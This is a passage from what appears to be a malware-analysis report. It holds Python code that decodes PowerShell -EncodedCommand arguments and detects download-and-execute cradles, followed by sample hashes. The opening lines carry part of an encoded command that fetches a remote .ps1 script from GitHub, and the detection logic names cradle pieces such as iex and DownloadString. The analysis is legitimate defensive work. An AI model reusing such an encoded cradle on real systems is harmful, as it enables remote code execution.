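    "aQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMA"
    "cQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# A switch starting with -e followed by a base64-looking argument.
_SWITCH = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
_URL = re.compile(r"https?://[^\s\"')]+")


def _is_encoded_command_switch(name):
    """powershell.exe accepts any prefix of EncodedCommand from -e up; pwsh also takes -ec.
    ExecutionPolicy needs at least -ex, so -ep and -exec fall through here."""
    name = name.lower()
    return name == "ec" or "encodedcommand".startswith(name)


def decode_encoded_command(cmdline):
    """Return the script carried by -e/-enc/-EncodedCommand, or None if there is none."""
    for switch, blob in _SWITCH.findall(cmdline):
        if not _is_encoded_command_switch(switch):
            continue
        try:
            # -EncodedCommand is base64 over the UTF-16LE bytes of the script text.
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def encode_command(script):
    """Build the argument PowerShell expects; handy for round-trip checks and fixtures."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_urls(script):
    return _URL.findall(script)


def cradle_indicators(script):
    """Which pieces of a classic download-and-execute cradle the decoded script contains."""
    low = script.lower()
    return {
        "invoke_expression": re.search(r"\b(iex|invoke-expression)\b", low) is not None,
        "webclient": "net.webclient" in low,
        "downloadstring": "downloadstring" in low,
        "urls": extract_urls(script),
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(ENCODED_CMDLINE)
    print(decoded)
    print(cradle_indicators(decoded))
```

base64.b64decode is called with validate=True so that a non-base64 token after a genuine -e switch is reported as "nothing decodable" rather than silently producing garbage; the same function can be pointed at the cmd.exe wrappers (PIDs 4008 and 3812) because they carry the identical argument.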
Network
MITRE ATT&CK Enterprise v6
Downloads
File names were not recorded on this page; hashes only.
- MD5: fbe1d2d9f17a1a7a0e534481748a89fc
  SHA1: ee97058aa9ff0ff9b3203fa816f0da9f15492843
  SHA256: ecaee54bb025bcaee3a7dbc5c84e2397db77d6a674f577174f0352070f6cb3e8
  SHA512: 82269332201a75d7f36cdb7509d088d1a2afc679d9f578c7f10f502814a986d94b28b2e1226febb39a53fc3ae021440b647dd0e07fddbf8aff650929c5f74bad
- MD5: 5ed1574f5f1b016d4e9bcfd7449b6675
  SHA1: 71789bd89093ce2a938abb03234ef49d2bdb167a
  SHA256: b8ea7f56529dbd8cf6ae452f518f61e661a0875bb8a5bf0a28d64cd63f6687c6
  SHA512: 24b5bef88868eecd39a9d5d9f9a2a61b01a4d52d36feefbf195ddbd5cd1e4c78c85c58c0fe9b4d4d5ad231fbdb38f2a757cd90655e60954c42aa2eeeae3422de
- MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- MD5: 78fc438bc0a10f68012273374fc242de
  SHA1: 1c2f8f958b4cfb2d822a50f97c1b503d039108d4
  SHA256: 14249168e782173812af05b444b582847646a69623a3254b8a590ba00365b4e0
  SHA512: 97d287f9e1ac939505e3ff2b7d6854ae838dd4f0cc3699d157912dcbb116b709b30580baac4c4ce7a5384e28de841dd44f12006c4857bc6a72bc8758427f280e
- MD5: d100ef4fd304d401b4b4b6b5609de42b
  SHA1: 954b0ac7da9b65892078e9aeb6c8e93ef1f75d38
  SHA256: e1132c3f8e65454e63f2d8715710bb0dc461e74205e7fe6a414914c8ac619123
  SHA512: 9880f20caa4437a70d47a22a64c2bb56cb1f35343c5aaae65b6c043f40b2e3b05ae99e387f6ba94d1aa21e65fb0da202450de4cf2da9602e4e93d862098ee229
- MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- MD5: 5dfde51bac009acc09ca1386d180eb91
  SHA1: eae3446e197188570a62108fba18a7533be854d4
  SHA256: fc3f53b5c5a20a2dcf0b43bee8b11daa9c815766695b5b2af309cb51afcf0eb7
  SHA512: a21dc36eda573465a5f45a9752bfc530219c3e65b4c71784d2557c0852fc937234f05fb5cb8f57786261da2d8f80e7beeb4682fda3484479f6bf7e53c445ae58
- MD5: 07044622ac01aea214d75af177a9976f
  SHA1: 8647e016414d4ef1da52abcf889210f15c58a640
  SHA256: e83dc368abf546e72a528509e3d2fd8e83153f783832abcef014cddb9da002e9
  SHA512: 21b30facf460b9c93d32e1a54d6e5e2578f49c782eb3325268f83ad9beb14dd2c06b9b8337161099a69c1ad082583fdf94d20c7c4e2c91063e6bc0e6c9664324
- MD5: 7c2b6a91963747383e5cdb168539962c
  SHA1: cd987c6f69702bf0369b4c49c898052fae21d513
  SHA256: fc3c17833725d727590ef00fdf3f8d70f52d4c13a9cf52a77b6e74e22d7dae61
  SHA512: 8a952e2e7ac644cb73bc35f1d099f8c9590027f5e5f89771131025ce878c000fec1aeaf708113889e1044094ebbc311ee46f945cca6946860705edac4eec8141